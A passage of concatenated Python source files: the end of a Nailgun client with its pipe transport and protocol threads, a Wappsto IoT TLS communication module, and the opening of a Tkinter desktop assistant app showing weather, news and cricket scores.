NailgunException.CONNECTION_BROKEN,
)
if not immediate:
if err != ERROR_IO_PENDING:
self._raise_win_err("failed to read %d bytes" % nbytes, GetLastError())
nread = wintypes.DWORD()
if not GetOverlappedResult(self.pipe, olap, nread, True):
err = GetLastError()
self._raise_win_err("error while waiting for read", err)
nread = nread.value
if not is_py2:
# Wrap in a memoryview, as python3 does not let you assign from a
# ctypes.c_char_array slice directly to a memory view, as one is 'c', and one
# is '<c' struct/buffer proto format.
buf = compat_memoryview(buf)
buffer[:nread] = buf[:nread]
return nread
def sendall(self, data):
olap = OVERLAPPED()
olap.hEvent = self.write_waitable
p = (ctypes.c_ubyte * len(data))(*(bytearray(data)))
immediate = WriteFile(self.pipe, p, len(data), None, olap)
if not immediate:
err = GetLastError()
if err != ERROR_IO_PENDING:
self._raise_win_err(
"failed to write %d bytes" % len(data), GetLastError()
)
# Obtain results, waiting if needed
nwrote = wintypes.DWORD()
if not GetOverlappedResult(self.pipe, olap, nwrote, True):
err = GetLastError()
self._raise_win_err("error while waiting for write", err)
nwrote = nwrote.value
if nwrote != len(data):
raise IOError("Async wrote less bytes!")
return nwrote
def select(self, timeout_secs):
start = monotonic_time_nanos()
timeout_nanos = timeout_secs * NSEC_PER_SEC
while True:
readable, exceptional = self.select_now()
if (
readable
or exceptional
or monotonic_time_nanos() - start > timeout_nanos
):
return readable, exceptional
# Sleep a bit to avoid busy looping for no reason.
time.sleep(0.05)
def select_now(self):
available_total = wintypes.DWORD()
exceptional = not PeekNamedPipe(self.pipe, None, 0, None, available_total, None)
readable = available_total.value > 0
result = readable, exceptional
return result
class NailgunConnection(object):
"""Stateful object holding the connection to the Nailgun server."""
def __init__(
self,
server_name,
server_port=None,
stdin=sys.stdin,
stdout=sys.stdout,
stderr=sys.stderr,
cwd=None,
heartbeat_interval_sec=DEFAULT_HEARTBEAT_INTERVAL_SEC,
):
self.transport = make_nailgun_transport(server_name, server_port, cwd)
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self.recv_flags = 0
self.send_flags = 0
self.header_buf = ctypes.create_string_buffer(CHUNK_HEADER_LEN)
self.buf = ctypes.create_string_buffer(BUFSIZE)
self.exit_code = None
self.shutdown_event = Event()
self.error_lock = RLock()
self.error = None
self.error_traceback = None
self.stdin_condition = Condition()
self.stdin_thread = Thread(target=stdin_thread_main, args=(self,))
self.stdin_thread.daemon = True
self.send_queue = Queue.Queue()
self.send_condition = Condition()
self.send_thread = Thread(target=send_thread_main, args=(self,))
self.send_thread.daemon = True
self.heartbeat_interval_sec = heartbeat_interval_sec
self.heartbeat_condition = Condition()
self.heartbeat_thread = None
if heartbeat_interval_sec > 0:
self.heartbeat_thread = Thread(target=heartbeat_thread_main, args=(self,))
self.heartbeat_thread.daemon = True
def send_command(
self, cmd, cmd_args=[], filearg=None, env=os.environ, cwd=os.getcwd()
):
"""
Sends the command and environment to the nailgun server, then loops forever
reading the response until the server sends an exit chunk.
Returns the exit value, or raises NailgunException on error.
"""
try:
return self._send_command_and_read_response(
cmd, cmd_args, filearg, env, cwd
)
except socket.error as e:
re_raise(
NailgunException(
"Server disconnected unexpectedly: {0}".format(e),
NailgunException.CONNECTION_BROKEN,
)
)
def _send_command_and_read_response(self, cmd, cmd_args, filearg, env, cwd):
self.stdin_thread.start()
self.send_thread.start()
try:
if filearg:
self._send_file_arg(filearg)
for cmd_arg in cmd_args:
self._send_chunk(cmd_arg, CHUNKTYPE_ARG)
self._send_env_var("NAILGUN_FILESEPARATOR", os.sep)
self._send_env_var("NAILGUN_PATHSEPARATOR", os.pathsep)
self._send_tty_format(self.stdin)
self._send_tty_format(self.stdout)
self._send_tty_format(self.stderr)
for k, v in env.items():
self._send_env_var(k, v)
self._send_chunk(cwd, CHUNKTYPE_DIR)
self._send_chunk(cmd, CHUNKTYPE_CMD)
if self.heartbeat_thread is not None:
self.heartbeat_thread.start()
while self.exit_code is None:
self._process_next_chunk()
finally:
self.shutdown_event.set()
with self.stdin_condition:
self.stdin_condition.notify()
with self.send_condition:
self.send_condition.notify()
if self.heartbeat_thread is not None:
with self.heartbeat_condition:
self.heartbeat_condition.notify()
self.heartbeat_thread.join(THREAD_TERMINATION_TIMEOUT_SEC)
self.stdin_thread.join(THREAD_TERMINATION_TIMEOUT_SEC)
self.send_thread.join(THREAD_TERMINATION_TIMEOUT_SEC)
return self.exit_code
def _process_next_chunk(self):
"""
Processes the next chunk from the nailgun server.
"""
readable, exceptional = self.transport.select(SELECT_MAX_BLOCK_TIME_SEC)
if readable:
self._process_nailgun_stream()
if exceptional:
raise NailgunException(
"Server disconnected in select", NailgunException.CONNECTION_BROKEN
)
# if daemon thread threw, rethrow here
if self.shutdown_event.is_set():
e = None
e_tb = None
with self.error_lock:
e = self.error
e_tb = self.error_traceback
if e is not None:
re_raise(e, e_tb)
def _send_chunk(self, buf, chunk_type):
"""
Send chunk to the server asynchronously
"""
self.send_queue.put((chunk_type, buf))
with self.send_condition:
self.send_condition.notify()
def _send_env_var(self, name, value):
"""
Sends an environment variable in KEY=VALUE format.
"""
self._send_chunk("=".join((name, value)), CHUNKTYPE_ENV)
def _send_tty_format(self, f):
"""
Sends a NAILGUN_TTY_# environment variable.
"""
if not f or not hasattr(f, "fileno") or isinstance(f, BytesIO):
return
try:
fileno = f.fileno()
isatty = os.isatty(fileno)
self._send_env_var("NAILGUN_TTY_" + str(fileno), str(int(isatty)))
except UnsupportedOperation:
return
def _send_file_arg(self, filename):
"""
Sends the contents of a file to the server.
"""
with open(filename) as f:
while True:
num_bytes = f.readinto(self.buf)
if not num_bytes:
break
self._send_chunk(self.buf.raw[:num_bytes], CHUNKTYPE_LONGARG)
def _recv_to_fd(self, dest_file, num_bytes):
"""
Receives num_bytes bytes from the nailgun socket and copies them to the specified file
object. Used to route data to stdout or stderr on the client.
"""
bytes_read = 0
dest_fd = dest_file
flush = False
if dest_file and hasattr(dest_file, 'buffer'):
dest_fd = dest_file.buffer
flush = True
# Make sure we've written anything that already existed in the buffer
dest_fd.flush()
while bytes_read < num_bytes:
bytes_to_read = min(len(self.buf), num_bytes - bytes_read)
bytes_received = self.transport.recv_into(self.buf, bytes_to_read)
if dest_fd:
dest_fd.write(self.buf[:bytes_received])
if flush:
dest_fd.flush()
bytes_read += bytes_received
def _recv_to_buffer(self, num_bytes, buf):
"""
Receives num_bytes from the nailgun socket and writes them into the specified buffer.
"""
# We'd love to use socket.recv_into() everywhere to avoid
# unnecessary copies, but we need to support Python 2.6. The
# only way to provide an offset to recv_into() is to use
# memoryview(), which doesn't exist until Python 2.7.
if HAS_MEMORYVIEW:
self._recv_into_memoryview(num_bytes, compat_memoryview(buf))
else:
self._recv_to_buffer_with_copy(num_bytes, buf)
def _recv_into_memoryview(self, num_bytes, buf_view):
"""
Receives num_bytes from the nailgun socket and writes them into the specified memoryview
to avoid an extra copy.
"""
bytes_read = 0
while bytes_read < num_bytes:
bytes_received = self.transport.recv_into(
buf_view[bytes_read:], num_bytes - bytes_read
)
if not bytes_received:
raise NailgunException(
"Server unexpectedly disconnected in recv_into()",
NailgunException.CONNECTION_BROKEN,
)
bytes_read += bytes_received
def _recv_to_buffer_with_copy(self, num_bytes, buf):
"""
Receives num_bytes from the nailgun socket and writes them into the specified buffer.
"""
bytes_read = 0
while bytes_read < num_bytes:
recv_buf = self.transport.recv(num_bytes - bytes_read)
if not len(recv_buf):
raise NailgunException(
"Server unexpectedly disconnected in recv()",
NailgunException.CONNECTION_BROKEN,
)
buf[bytes_read : bytes_read + len(recv_buf)] = recv_buf
bytes_read += len(recv_buf)
def _process_exit(self, exit_len):
"""
Receives an exit code from the nailgun server and sets nailgun_connection.exit_code
to indicate the client should exit.
"""
num_bytes = min(len(self.buf), exit_len)
self._recv_to_buffer(num_bytes, self.buf)
self.exit_code = int(self.buf.raw[:num_bytes])
def _send_heartbeat(self):
"""
Sends a heartbeat to the nailgun server to indicate the client is still alive.
"""
self._send_chunk("", CHUNKTYPE_HEARTBEAT)
def _process_nailgun_stream(self):
"""
Processes a single chunk from the nailgun server.
"""
self._recv_to_buffer(len(self.header_buf), self.header_buf)
(chunk_len, chunk_type) = struct.unpack_from(">ic", self.header_buf.raw)
if chunk_type == CHUNKTYPE_STDOUT:
self._recv_to_fd(self.stdout, chunk_len)
elif chunk_type == CHUNKTYPE_STDERR:
self._recv_to_fd(self.stderr, chunk_len)
elif chunk_type == CHUNKTYPE_EXIT:
self._process_exit(chunk_len)
elif chunk_type == CHUNKTYPE_SENDINPUT:
# signal stdin thread to get and send more data
with self.stdin_condition:
self.stdin_condition.notify()
else:
raise NailgunException(
"Unexpected chunk type: {0}".format(chunk_type),
NailgunException.UNEXPECTED_CHUNKTYPE,
)
def wait_termination(self, timeout):
"""
Wait for shutdown event to be signalled within specified interval
Return True if termination was signalled, False otherwise
"""
wait_time = timeout
start = monotonic_time_nanos()
with self.send_condition:
while True:
if self.shutdown_event.is_set():
return True
self.send_condition.wait(wait_time)
elapsed = (monotonic_time_nanos() - start) * 1.0 / NSEC_PER_SEC
wait_time = timeout - elapsed
if wait_time <= 0:
return False
return False
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
try:
self.transport.close()
except socket.error:
pass
def monotonic_time_nanos():
"""Returns a monotonically-increasing timestamp value in nanoseconds.
The epoch of the return value is undefined. To use this, you must call
it more than once and calculate the delta between two calls.
"""
# This function should be overwritten below on supported platforms.
raise Exception("Unsupported platform: " + platform.system())
if platform.system() == "Linux":
# From <linux/time.h>, available since 2.6.28 (released 24-Dec-2008).
CLOCK_MONOTONIC_RAW = 4
librt = ctypes.CDLL("librt.so.1", use_errno=True)
clock_gettime = librt.clock_gettime
class struct_timespec(ctypes.Structure):
_fields_ = [("tv_sec", ctypes.c_long), ("tv_nsec", ctypes.c_long)]
clock_gettime.argtypes = [ctypes.c_int, ctypes.POINTER(struct_timespec)]
def _monotonic_time_nanos_linux():
t = struct_timespec()
clock_gettime(CLOCK_MONOTONIC_RAW, ctypes.byref(t))
return t.tv_sec * NSEC_PER_SEC + t.tv_nsec
monotonic_time_nanos = _monotonic_time_nanos_linux
elif platform.system() == "Darwin":
# From <mach/mach_time.h>
KERN_SUCCESS = 0
libSystem = ctypes.CDLL("/usr/lib/libSystem.dylib", use_errno=True)
mach_timebase_info = libSystem.mach_timebase_info
class struct_mach_timebase_info(ctypes.Structure):
_fields_ = [("numer", ctypes.c_uint32), ("denom", ctypes.c_uint32)]
mach_timebase_info.argtypes = [ctypes.POINTER(struct_mach_timebase_info)]
mach_ti = struct_mach_timebase_info()
ret = mach_timebase_info(ctypes.byref(mach_ti))
if ret != KERN_SUCCESS:
raise Exception("Could not get mach_timebase_info, error: " + str(ret))
mach_absolute_time = libSystem.mach_absolute_time
mach_absolute_time.restype = ctypes.c_uint64
def _monotonic_time_nanos_darwin():
return (mach_absolute_time() * mach_ti.numer) / mach_ti.denom
monotonic_time_nanos = _monotonic_time_nanos_darwin
elif platform.system() == "Windows":
# From <Winbase.h>
perf_frequency = ctypes.c_uint64()
ctypes.windll.kernel32.QueryPerformanceFrequency(ctypes.byref(perf_frequency))
def _monotonic_time_nanos_windows():
perf_counter = ctypes.c_uint64()
ctypes.windll.kernel32.QueryPerformanceCounter(ctypes.byref(perf_counter))
return perf_counter.value * NSEC_PER_SEC / perf_frequency.value
monotonic_time_nanos = _monotonic_time_nanos_windows
elif sys.platform == "cygwin":
k32 = ctypes.CDLL("Kernel32", use_errno=True)
perf_frequency = ctypes.c_uint64()
k32.QueryPerformanceFrequency(ctypes.byref(perf_frequency))
def _monotonic_time_nanos_cygwin():
perf_counter = ctypes.c_uint64()
k32.QueryPerformanceCounter(ctypes.byref(perf_counter))
return perf_counter.value * NSEC_PER_SEC / perf_frequency.value
monotonic_time_nanos = _monotonic_time_nanos_cygwin
def send_thread_main(conn):
"""
Sending thread worker function
Waits for data and transmits it to server
"""
try:
header_buf = ctypes.create_string_buffer(CHUNK_HEADER_LEN)
while True:
connection_error = None
while not conn.send_queue.empty():
# only this thread can deplete the queue, so it is safe to use blocking get()
(chunk_type, buf) = conn.send_queue.get()
bbuf = to_bytes(buf)
struct.pack_into(">ic", header_buf, 0, len(bbuf), chunk_type)
# these chunk types are not required for server to accept and process and server may terminate
# any time without waiting for them
is_required = chunk_type not in (
CHUNKTYPE_HEARTBEAT,
CHUNKTYPE_STDIN,
CHUNKTYPE_STDIN_EOF,
)
try:
conn.transport.sendall(header_buf.raw)
conn.transport.sendall(bbuf)
except socket.error as e:
# The server may send termination signal and close the socket immediately; attempt to write
# to such a socket (i.e. heartbeats) results in an error (SIGPIPE)
# Nailgun protocol is not duplex so the server does not wait on client to acknowledge
# We catch an exception and ignore it if termination has happened shortly afterwards
if not is_required and conn.wait_termination(
SEND_THREAD_WAIT_TERMINATION_SEC
):
return
raise
with conn.send_condition:
if conn.shutdown_event.is_set():
return
if not conn.send_queue.empty():
continue
conn.send_condition.wait()
if conn.shutdown_event.is_set():
return
except Exception as e:
# save exception to rethrow on main thread
with conn.error_lock:
conn.error = e
conn.error_traceback = sys.exc_info()[2]
conn.shutdown_event.set()
def stdin_thread_main(conn):
"""
Stdin thread reading worker function
If stdin is available, read it to internal buffer and send to server
"""
try:
eof = False
while True:
# wait for signal to read new line from stdin or shutdown
# we do not start reading from stdin before server actually requests that
with conn.stdin_condition:
if conn.shutdown_event.is_set():
return
conn.stdin_condition.wait()
if conn.shutdown_event.is_set():
return
if not conn.stdin or eof:
conn._send_chunk(buf, CHUNKTYPE_STDIN_EOF)
continue
buf = conn.stdin.readline()
if buf == "":
eof = True
conn._send_chunk(buf, CHUNKTYPE_STDIN_EOF)
continue
conn._send_chunk(buf, CHUNKTYPE_STDIN)
except Exception as e:
# save exception to rethrow on main thread
with conn.error_lock:
conn.error = e
conn.error_traceback = sys.exc_info()[2]
conn.shutdown_event.set()
def heartbeat_thread_main(conn):
"""
Heartbeat thread worker function
Periodically sends heartbeats to server as long as command is running
"""
try:
while True:
with conn.heartbeat_condition:
if conn.shutdown_event.is_set():
return
conn.heartbeat_condition.wait(conn.heartbeat_interval_sec)
if conn.shutdown_event.is_set():
return
conn._send_heartbeat()
except Exception as e:
# save exception to rethrow on main thread
with conn.error_lock:
conn.error = e
conn.error_traceback = sys.exc_info()[2]
conn.shutdown_event.set()
def make_nailgun_transport(nailgun_server, nailgun_port=None, cwd=None):
"""
Creates and returns a socket connection to the nailgun server.
"""
transport = None
if nailgun_server.startswith("local:"):
if platform.system() == "Windows":
pipe_addr = nailgun_server[6:]
transport = WindowsNamedPipeTransport(pipe_addr)
else:
try:
s = socket.socket(socket.AF_UNIX)
except socket.error as msg:
re_raise(
NailgunException(
"Could not create local socket connection to server: {0}".format(
msg
),
NailgunException.SOCKET_FAILED,
)
)
socket_addr = nailgun_server[6:]
prev_cwd = os.getcwd()
try:
if cwd is not None:
os.chdir(cwd)
s.connect(socket_addr)
transport = UnixTransport(s)
except socket.error as msg:
re_raise(
NailgunException(
"Could not connect to local server at {0}: {1}".format(
socket_addr, msg
),
NailgunException.CONNECT_FAILED,
)
)
finally:
if cwd is not None:
os.chdir(prev_cwd)
else:
socket_addr = nailgun_server
socket_family = socket.AF_UNSPEC
for (af, socktype, proto, _, sa) in socket.getaddrinfo(
nailgun_server, nailgun_port, socket.AF_UNSPEC, socket.SOCK_STREAM
):
try:
s = socket.socket(af, socktype, proto)
except socket.error as msg:
s = None
continue
try:
s.connect(sa)
transport = UnixTransport(s)
except socket.error as msg:
s.close()
s = None
continue
break
if transport is None:
raise NailgunException(
"Could not connect to server {0}:{1}".format(nailgun_server, nailgun_port),
NailgunException.CONNECT_FAILED,
)
return transport
if is_py2:
exec(
'''
def re_raise(ex, ex_trace = None):
"""
Throw ex and preserve stack trace of original exception if we run on Python 2
"""
if ex_trace is None:
ex_trace = sys.exc_info()[2]
raise ex, None, ex_trace
'''
)
else:
def re_raise(ex, ex_trace=None):
"""
Throw ex and preserve stack trace of original exception if we run on Python 2
"""
raise ex
def main():
"""
Main entry point to the nailgun client.
"""
default_nailgun_server = os.environ.get("NAILGUN_SERVER", "127.0.0.1")
default_nailgun_port = int(os.environ.get("NAILGUN_PORT", NAILGUN_PORT_DEFAULT))
parser = optparse.OptionParser(usage="%prog [options] cmd arg1 arg2 ...")
parser.add_option("--nailgun-server", default=default_nailgun_server)
parser.add_option("--nailgun-port", type="int", default=default_nailgun_port)
parser.add_option("--nailgun-filearg")
parser.add_option("--nailgun-showversion", action="store_true")
parser.add_option("--nailgun-help", action="help")
(options, args) = parser.parse_args()
if options.nailgun_showversion:
print("NailGun client version " + NAILGUN_VERSION)
if len(args):
cmd = args.pop(0)
else:
cmd = os.path.basename(sys.argv[0])
# Pass any remaining command line arguments to the server.
cmd_args = args
try:
with NailgunConnection(
options.nailgun_server, server_port=options.nailgun_port
) as c:
exit_code = c.send_command(cmd, cmd_args, options.nailgun_filearg)
sys.exit(exit_code)
except NailgunException as e:
sys.stderr.write(str(e))
sys.exit(e.code)
except KeyboardInterrupt as e:
pass
if __name__ == "__main__":
main()
|
communication.py
|
"""
The server communication module.
Stores the server communication functionality for Wappsto as well as the
sending and receiving threads.
"""
import os
import socket
import threading
import time
import queue
import ssl
import logging
from . import message_data
from . import receive_data
from . import send_data
from .. import status
from ..errors import wappsto_errors
class ClientSocket:
"""
The ClientSocket class that manages connection.
Stores the sending and receiving threads, certificates as well as connection
information.
"""
def __init__(self, rpc, data_manager, address, port, path_to_calling_file,
wappsto_status, automatic_trace, event_storage):
"""
Create a client socket.
Creates a socket instance for the given address and port. Handles
transfer of data from the instance attributes and methods to the
specified server. Connection to the server is based on the specified
address and port.
Args:
rpc: Sending/receiving queue processing instance.
data_manager: data_manager of DataManager.
address: Server address.
port: Server port.
path_to_calling_file: path to OS directory of calling file.
wappsto_status: status object.
handler: instance of handlers.
automatic_trace: indicates if all messages automaticaly send trace.
event_storage: instance of event log.
"""
self.wapp_log = logging.getLogger(__name__)
self.wapp_log.addHandler(logging.NullHandler())
self.data_manager = data_manager
self.path_to_calling_file = path_to_calling_file
self.ssl_server_cert = os.path.join(path_to_calling_file,
"certificates/ca.crt")
self.ssl_client_cert = os.path.join(path_to_calling_file,
"certificates/client.crt")
self.ssl_key = os.path.join(path_to_calling_file,
"certificates/client.key")
self.address = address
self.port = port
self.ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
self.ssl_context.verify_mode = ssl.CERT_REQUIRED
self.ssl_context.load_cert_chain(self.ssl_client_cert, self.ssl_key)
self.ssl_context.load_verify_locations(self.ssl_server_cert)
self.wappsto_status = wappsto_status
self.receive_data = receive_data.ReceiveData(self)
self.receiving_thread = threading.Thread(target=self.receive_data.receive_thread)
self.receiving_thread.setDaemon(True)
self.send_data = send_data.SendData(self, automatic_trace)
self.sending_thread = threading.Thread(target=self.send_data.send_thread)
self.sending_thread.setDaemon(True)
self.connected = False
self.sending_queue = queue.Queue(maxsize=0)
self.rpc = rpc
self.event_storage = event_storage
self.packet_awaiting_confirm = {}
self.lock_await = threading.Lock()
self.set_sockets()
self.data_manager.network.rpc = self.rpc
self.data_manager.network.conn = self
def set_sockets(self):
"""
Create socket to communicate with server.
Creates a socket instance and sets the options for communication.
Passes the socket to the ssl_wrap method
"""
self.my_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.my_raw_socket.setsockopt(
socket.SOL_SOCKET,
socket.SO_KEEPALIVE,
1
)
if (hasattr(socket, "TCP_KEEPIDLE")
and hasattr(socket, "TCP_KEEPINTVL")
and hasattr(socket, "TCP_KEEPCNT")):
# After 5 idle minutes, start sending keepalives every 1 minutes.
# Drop connection after 2 failed keepalives
self.my_raw_socket.setsockopt(
socket.SOL_TCP,
socket.TCP_KEEPIDLE,
5 * 60
)
self.my_raw_socket.setsockopt(
socket.IPPROTO_TCP,
socket.TCP_KEEPIDLE,
5 * 60
)
self.my_raw_socket.setsockopt(
socket.IPPROTO_TCP,
socket.TCP_KEEPINTVL,
60
)
self.my_raw_socket.setsockopt(
socket.IPPROTO_TCP,
socket.TCP_KEEPCNT,
2
)
# self.my_raw_socket.setsockopt(
# socket.IPPROTO_TCP,
# socket.TCP_USER_TIMEOUT,
# 30000
# )
self.my_socket = self.ssl_wrap()
def ssl_wrap(self):
"""
Wrap socket.
Wraps the socket using the SSL protocol as configured in the SSL
context, with hostname verification enabled.
Returns:
An SSL wrapped socket.
"""
return self.ssl_context.wrap_socket(
self.my_raw_socket,
server_hostname=self.address
)
def connect(self):
"""
Connect to the server.
Attempts a connection to the server on the provided addres and port.
Returns:
A connection flag to denote if the connection was successful or
not.
"""
self.connected = False
try:
self.my_socket.settimeout(10)
self.my_socket.connect((self.address, self.port))
self.connected = True
self.my_socket.settimeout(None)
self.wappsto_status.set_status(status.CONNECTED)
self.send_logged_data()
return True
except Exception as e:
self.wapp_log.error("Failed to connect: {}".format(e))
return False
def send_logged_data(self):
"""
Sends logged data.
Makes a thread that sends all of the logged data.
"""
processThread = threading.Thread(target=self.event_storage.send_log, args=(self,))
processThread.start()
def initialize_all(self):
"""
Call initialize_all method in initialize_code module.
Initializes the object instances on the sending/receiving queue.
"""
for device in self.data_manager.network.devices:
for value in device.values:
state = value.get_control_state()
if state is not None:
msg = message_data.MessageData(
message_data.SEND_CONTROL,
network_id=state.parent.parent.parent.uuid,
device_id=state.parent.parent.uuid,
value_id=state.parent.uuid,
state_id=state.uuid,
verb=message_data.GET
)
self.send_data.send_control(msg)
trace_id = self.send_data.create_trace(self.data_manager.network.uuid)
message = self.rpc.get_rpc_whole_json(self.data_manager.get_encoded_network(), trace_id)
self.send_data.create_bulk(message)
msg = "The whole network {} added to Sending queue {}.".format(
self.data_manager.network.name,
self.rpc
)
self.wapp_log.debug(msg)
self.confirm_initialize_all()
def add_id_to_confirm_list(self, data):
"""
Add the message ID to the confirm list.
Adds the ID of the decoded JSON message to the list of confirmed
packets. Uses locks to ensure atomicity.
Args:
data: JSON communication message data.
"""
self.lock_await.acquire()
self.packet_awaiting_confirm[data.get('id')] = data
self.lock_await.release()
def remove_id_from_confirm_list(self, _id):
"""
Remove the ID from the confirm list.
Removes the ID of the decoded JSON message from the list of confirmed
packets. Uses locks to ensure atomicity.
Args:
_id: ID to remove from the confirm list.
"""
self.lock_await.acquire()
if _id in self.packet_awaiting_confirm:
del self.packet_awaiting_confirm[_id]
self.lock_await.release()
def reconnect(self, retry_limit=None, send_reconnect=True):
"""
Attempt to reconnect.
Reconnection attemps in the instance of a connection being interrupted.
"""
self.wappsto_status.set_status(status.RECONNECTING)
self.connected = False
attempt = 0
while not self.connected and (retry_limit is None
or retry_limit > attempt):
attempt += 1
self.wapp_log.info("Trying to reconnect in 5 seconds")
time.sleep(5)
self.close()
self.set_sockets()
self.connect()
if self.connected is True:
self.wapp_log.info("Reconnected with " + str(attempt) + " attempts")
if send_reconnect:
reconnect = message_data.MessageData(message_data.SEND_RECONNECT)
self.sending_queue.put(reconnect)
else:
msg = ("Unable to connect to the server[IP: {}, Port: {}]"
.format(self.address, self.port)
)
raise wappsto_errors.ServerConnectionException(msg)
def get_object_without_none_values(self, encoded_object):
"""
Remove objects with None values.
Gets objects and removes any keys where value is None.
Args:
encoded_object: dictionary object.
"""
for key, val in list(encoded_object.items()):
if val is None:
del encoded_object[key]
elif isinstance(val, dict):
self.get_object_without_none_values(val)
if len(val) == 0:
del encoded_object[key]
elif isinstance(val, list):
for val_element in val:
self.get_object_without_none_values(val_element)
if len(val_element) == 0:
val.remove(val_element)
if len(val) == 0:
del encoded_object[key]
def close(self):
"""
Close the connection.
Closes the socket object connection.
"""
self.wapp_log.info("Closing connection...")
for device in self.data_manager.network.devices:
for value in device.values:
if value.timer.is_alive():
msg = "Value: {} is no longer periodically sending updates.".format(value.uuid)
self.wapp_log.debug(msg)
value.timer.cancel()
self.connected = False
if self.my_socket:
self.my_socket.close()
self.my_socket = None
if self.my_raw_socket:
self.my_raw_socket.close()
self.my_raw_socket = None
def confirm_initialize_all(self):
"""
Confirms that all responses are received.
Goes through the list saving expected responses and checks if they are
received.
"""
while len(self.packet_awaiting_confirm) > 0:
self.receive_data.receive_message()
|
main.py
|
# import required libraries
from tkinter import ttk
from pycricbuzz import Cricbuzz
from win10toast import ToastNotifier
from tkinter.messagebox import *
from tkinter.filedialog import *
import json
import pytesseract
import os
from mutagen.mp3 import MP3
import threading
from PIL import Image,ImageTk
import random
import wikipedia
import webbrowser
import cv2
from difflib import get_close_matches
from translate import Translator
from time import strftime,sleep
from datetime import *
import textwrap
from bbcnews import getweather,NewsFromBBC,searchbooks # get news methods from bbcnews.py
import backend #get bookstore backend
from google_images_download import google_images_download
from jarvis import * #get voice assistant methods from jarvis.py
from pygame import mixer
# class for root window
class Window(object):
def __init__(self,root):
# Defining root properties
self.root=root
self.root.title('R.A.SSISTANT')
self.root.geometry("540x640+500+5")
self.root.resizable(False, False)
self.style = ttk.Style()
self.style.theme_use('alt')
self.tabControl = ttk.Notebook(self.root)
self.tabControl.bind('<Button-1>', self.onclick)
self.tabControl.pack(expand=1, fill="both")
# onlclick method for tabs
def onclick(self,event):
clicked_tab = self.tabControl.tk.call(self.tabControl._w, "identify", "tab", event.x, event.y)
active_tab = self.tabControl.index(self.tabControl.select())
if clicked_tab == 4:
if active_tab != 4:
t=threading.Thread(target=self.mythread)
t.start()
def mythread(self):
try:
voiceassistant.wishMe()
speak("Jarvis here. Please tell me how may I help you")
except:
print("error")
# homepage class
class Homepage:
def __init__(self,tabControl):
# add tab
self.tab1=ttk.Frame(tabControl)
tabControl.add(self.tab1,text="Home")
self.mynotifier=Label(self.tab1)
self.c = Cricbuzz()
self.matches = self.c.matches()
self.n=ToastNotifier()
# create a new frame and pack widgets in it
self.row1 = Frame(self.tab1, bg="lightyellow")
#label for displaying clock
self.clocklbl = Label(self.row1, font=('calibri', 15, 'bold'), fg="blue", bg="lightgreen")
# weather image
self.weatherimg = Image.open("images/weatherimg.jpeg")
# get height and width of image
wd, ht = self.weatherimg.size
# resize image
self.weatherimg = self.weatherimg.resize((wd // 4, ht // 4))
# convert to tkinter image
self.render = ImageTk.PhotoImage(self.weatherimg)
# label to display image
self.weatherimglbl = Label(self.row1, image=self.render)
# set image to label
self.weatherimglbl.image = self.render
# Get weather of a city entered by user
self.lblweather = Label(self.row1, text="Today's Weather", font=('calibri', 20, 'bold'))
self.myweathervar = StringVar()
# Label to display weather of my city
self.myweather = Label(self.row1, textvariable=self.myweathervar, bg='lightgray', font=('times', 11, 'bold'))
# calling getweather method defined in bbcnews
self.cityweather = getweather("nagpur")
# set weather details
self.myweathervar.set(self.cityweather)
# get weather of any city in the world
self.getcityweatherlbl = Label(self.row1, text="Get Weather for city :", font=('times', 15, 'bold'))
self.cityvar = StringVar()
# entry to accept cityname as input
self.cityvarentry = Entry(self.row1, textvariable=self.cityvar, font=('times', 15))
self.showvar = StringVar()
# label to display weather info
self.showweatherlbl = Label(self.row1, textvariable=self.showvar, bg='lightpink', font=('times', 10, 'bold'))
# creating new frame to display news headlines
self.row7 = Frame(self.tab1)
self.newslbl = Label(self.row7, text="Headlines for Today:",bg="lightgreen", font=('times', 15, 'bold'))
self.newstext = Label(self.row7, bg="lightyellow", font=('times', 12), wraplength=530, justify="left")
self.mytt = threading.Thread(target=self.mynotify)
self.mytt.daemon=True
self.mytt.start()
# define properties of widgets
def set(self):
self.cityvarentry.config(bd=5)
self.cityvarentry.bind("<Return>", self.getcityweather)
self.getnews()
# get news
def getnews(self):
self.results = NewsFromBBC()
i = 0
for ar in self.results:
ss = str(i + 1) + ". " + ar["title"] + "\n"
ss = self.newstext.cget("text") + ss
self.newstext.config(text=ss)
i += 1
# getcityweather
def getcityweather(self,event):
if self.cityvar.get() == "":
self.cityvar.set("")
showerror("Error", "City Not Found \n"
"Please enter valid city name")
else:
if getweather(self.cityvar.get()) == "N":
self.cityvar.set("")
showerror("Error", "City Not Found \n"
"Please enter valid city name")
else:
self.showweatherlbl.grid(row=1, column=2, pady="10")
self.showvar.set(getweather(self.cityvar.get()))
self.cityvarentry.delete(0, END)
# method to update time in clock label
def gettime(self):
string = strftime('%H:%M:%S %p')
self.clocklbl.config(text=string + " " + str(datetime.now().date()))
self.clocklbl.after(1000, self.gettime)
def mynotify(self):
self.f=0
flag=0
while self.f==0:
for match in self.matches:
if (match['mchstate'] == 'inprogress'):
live = self.c.livescore(match['id'])
mymatch = match['team1']['name'] + ' Vs ' + match['team2']['name'] + "\n" + 'Batting ' + \
live['batting']['team'] + "\n" + \
live['batting']['score'][0]['runs'] + '/' + live['batting']['score'][0]['wickets'] + ' ' + \
live['batting']['score'][0]['overs'] + ' overs' + "\n" + \
live['batting']['batsman'][0]['name'] + ' ' + live['batting']['batsman'][0]['runs'] + '(' + \
live['batting']['batsman'][0]['balls'] + ')*'
if len(live['batting']['batsman']) > 1:
mymatch += " " + live['batting']['batsman'][1]['name'] + ' ' + live['batting']['batsman'][1][
'runs'] + '(' + live['batting']['batsman'][1]['balls'] + ')*'
self.n.show_toast("Live Cricket",mymatch, duration=10)
flag=1
break
if flag==1:
for i in range(1,100000000):
if self.f==1:
break
else:
break
# packing widgets to window
def packwidgets(self):
self.row1.pack(fill="both")
self.gettime()
self.clocklbl.grid(row=0, column=2, padx="10")
self.weatherimglbl.grid(row=0, column=0)
self.lblweather.grid(row=0, column=1)
self.myweather.grid(row=1, column=0, columnspan=2, pady="10")
self.getcityweatherlbl.grid(row=2, column=0, columnspan=3, padx="20", sticky=N)
self.cityvarentry.grid(row=3, column=0, columnspan=3, padx="20", pady="10", sticky=N)
self.row7.pack(fill="both")
self.newstext.grid(row=1, column=0, sticky=W, pady="10")
self.newslbl.grid(row=0, column=0, pady="10", sticky=W)
# dictionary class
